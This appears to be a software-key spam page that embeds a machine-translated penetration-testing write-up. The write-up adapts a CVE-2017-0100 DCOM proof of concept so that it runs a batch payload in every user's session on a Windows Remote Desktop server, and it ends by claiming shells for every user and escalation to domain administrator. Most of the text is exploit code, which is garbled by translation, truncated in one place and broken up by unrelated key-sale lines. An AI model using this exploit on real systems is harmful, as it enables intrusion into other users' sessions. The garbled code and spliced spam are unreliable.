buy cheap Windows Server 2012 R2 key | Windows Server 2012 R2 with the process of sharing

Windows Server 2012 R2 with the process of sharing
0x01 Overview
buy cheap Windows Server 2016 Essentials key
We did not make progress after a Windows Server 2012 R2 was getting low, and then we noticed CVE-2017-0100, which in theory allowed us to perform payloads on each user's active session on the server. Vulnerability and proof of concept vulnerability were filed by James Forshaw; we modified it to suit our situation. The concept proves that a session tag with a DCOM activator is used to allow the user to start any process in a session of another logged-in user.

After analyzing the original proof of the concept, we need to make some changes to suit our situation.
1) Determine what type of payload is feasible with this vulnerability and how the modified payload is identified and executed.
Visual Studio Professional 2017 product key sale
Here is the original code:
Console.WriteLine ("Creating Process in Session {0} after 20secs", new_session_id); Thread.Sleep (20000); IHxHelpPaneServer server = (IHxHelpPaneServer) Marshal.BindToMoniker (String.Format
    ("Session: {0}! New: 8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id)); Uri target = new Uri (Path.Combine (Environment.GetFolderPath (Environment.SpecialFolder.System)
 "Notepad.exe")); server.Execute (target.AbsoluteUri);
After determining that the target parameter is essentially the path of the executable file, the first thing we tried was to try the Regsvr32.exe payload published by Casey Smith's blog. However, we can not get the IHxHelpPaneServer server's execution function to accept the parameters.

We decided to find a path and put a small. Bat file inside, the path is that each user can access the "C: \ TEMP \".

Here is our modified code:
Console.WriteLine ("Creating Process in Session {0} after 20secs", new_session_id); Thread.Sleep
2) Allow the vulnerability to execute code on each session, not just one

The original proof of the proof will collect the session ID for each session on the host, but then execute the code only on one session.
windows 10 enterprise key sale
Here is the original code:
Try {
    Int current_session_id = Process.GetCurrentProcess (). SessionId;
    Int new_session_id = 0;
    Console.WriteLine ("Waiting For a Target Session");
    While (true)
    {
        IEnumerable <int> sessions = GetSessionIds (). Where (id => id! = Current_session_id);
        If (sessions.Count ()> 0)
        {
            New_session_id = sessions.First ();
            Break
        }
        Thread.Sleep (1000);
    }}
Our situation requires that we can execute the code in the context of each user, not just the first session. To do this, we simply select a session randomly in the "sessions" object of the existing IEnumerable and use that session to perform our payload. Due to the nature of the random selection, you can execute the code twice on the same user.
get cheap Intuit TurboTax Deluxe 2016 key
Here is our modified code:
Try {
    Int current_session_id = Process.GetCurrentProcess (). SessionId;
    Int new_session_id = 0;
    Console.WriteLine ("Waiting For a Target Session");
    While (true)
    {
        IEnumerable <int> sessions = GetSessionIds (). Where (id => id! = Current_session_id);
        If (sessions.Count ()> 0)
        {
            Random rnd = new Random ();
            Int r = rnd.Next (sessions.Count ());
            New_session_id = sessions.ElementAt (r);
            Break
        }
        Thread.Sleep (1000);
    }}
3) keep the loopholes running until we manually kill the process

The original code will be executed once and then exit. To solve this problem, we only need to let IHxHelpPaneServer in the while loop function.

Here is the original code:
Try {
    Int current_session_id = Process.GetCurrentProcess (). SessionId;
    Int new_session_id = 0;
    Console.WriteLine ("Waiting For a Target Session");
    While (true)
    {
        IEnumerable <int> sessions = GetSessionIds (). Where (id => id! = Current_session_id);
        If (sessions.Count ()> 0)
        {
            New_session_id = sessions.First ();
            Break
        }
        Thread.Sleep (1000);
    }

    Console.WriteLine ("Creating Process in Session {0} after 20secs", new_session_id);
    Thread.Sleep (20000);
    IHxHelpPaneServer server = (IHxHelpPaneServer) Marshal.BindToMoniker (String.Format ("session: {0}! New: 8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
    Uri target = new Uri (Path.Combine (Environment.GetFolderPath (Environment.SpecialFolder.System), "notepad.exe"))
    Server.Execute (target.AbsoluteUri);} catch (Exception ex) {
    Console.WriteLine (ex);}
cheap project professional 2013 key sale online
Here is the code we modified:
Try {
    Int current_session_id = Process.GetCurrentProcess (). SessionId;
    Int new_session_id = 0;
    Console.WriteLine ("Waiting For a Target Session");
    While (true)
    {
        IEnumerable <int> sessions = GetSessionIds (). Where (id => id! = Current_session_id);
        If (sessions.Count ()> 0)
        {
            Random rnd = new Random ();
            Int r = rnd.Next (sessions.Count ());
            New_session_id = sessions.ElementAt (r);
            Console.WriteLine ("Creating Process in Session {0} after 20secs", new_session_id);
            Thread.Sleep (20000);
            IHxHelpPaneServer server = (IHxHelpPaneServer) Marshal.BindToMoniker (String.Format ("session: {0}! New: 8cec58ae-07a1-11d9-b15e-000d56bfe6ee", new_session_id));
            Uri target = new Uri ("C: \\ TEMP \\ testing.bat");
            Server.Execute (target.AbsoluteUri);
        }
        Thread.Sleep (60000);
    }} Catch (Exception ex) {
    Console.WriteLine (ex);}
in conclusion

We understand that we are pleased to be able to modify and succeed with James Forshaw's loopholes in our situation, and finally we have successfully generated shells for each user on the remote desktop server. With these permissions, we can Upgrade to domain administrator.